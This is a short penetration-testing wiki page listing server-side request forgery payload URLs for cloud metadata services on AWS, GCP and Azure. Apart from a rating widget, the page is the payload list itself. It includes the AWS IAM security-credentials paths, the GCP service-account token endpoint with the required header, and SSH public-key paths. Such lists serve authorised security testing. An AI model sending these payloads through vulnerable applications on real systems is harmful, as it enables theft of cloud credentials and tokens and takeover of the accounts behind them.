✅ SSRF Payloads List

Penetration Testing Wiki

SSRF Attacks



Internal URLs by provider: https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b

AWS

  • http://169.254.169.254/latest/user-data
  • http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
  • http://169.254.169.254/latest/meta-data/ami-id
  • http://169.254.169.254/latest/meta-data/reservation-id
  • http://169.254.169.254/latest/meta-data/hostname
  • http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
  • http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
  • http://169.254.169.254/latest/meta-data/
  • http://169.254.169.254/latest/meta-data/public-keys/

GCP

NOTE: Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”

  • http://169.254.169.254/computeMetadata/v1/
  • http://metadata.google.internal/computeMetadata/v1/
  • http://metadata/computeMetadata/v1/
  • http://metadata.google.internal/computeMetadata/v1/instance/hostname
  • http://metadata.google.internal/computeMetadata/v1/instance/id
  • http://metadata.google.internal/computeMetadata/v1/instance/region
  • http://metadata.google.internal/computeMetadata/v1/instance/zone
  • http://metadata.google.internal/computeMetadata/v1/project/project-id
  • http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
  • http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/
  • http://metadata.google.internal/computeMetadata/v1beta1/

Azure

  • http://169.254.169.254/metadata/v1/maintenance

Blind SSRF reference: https://github.com/assetnote/blind-ssrf-chains

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 1

No votes so far! Be the first to rate this post.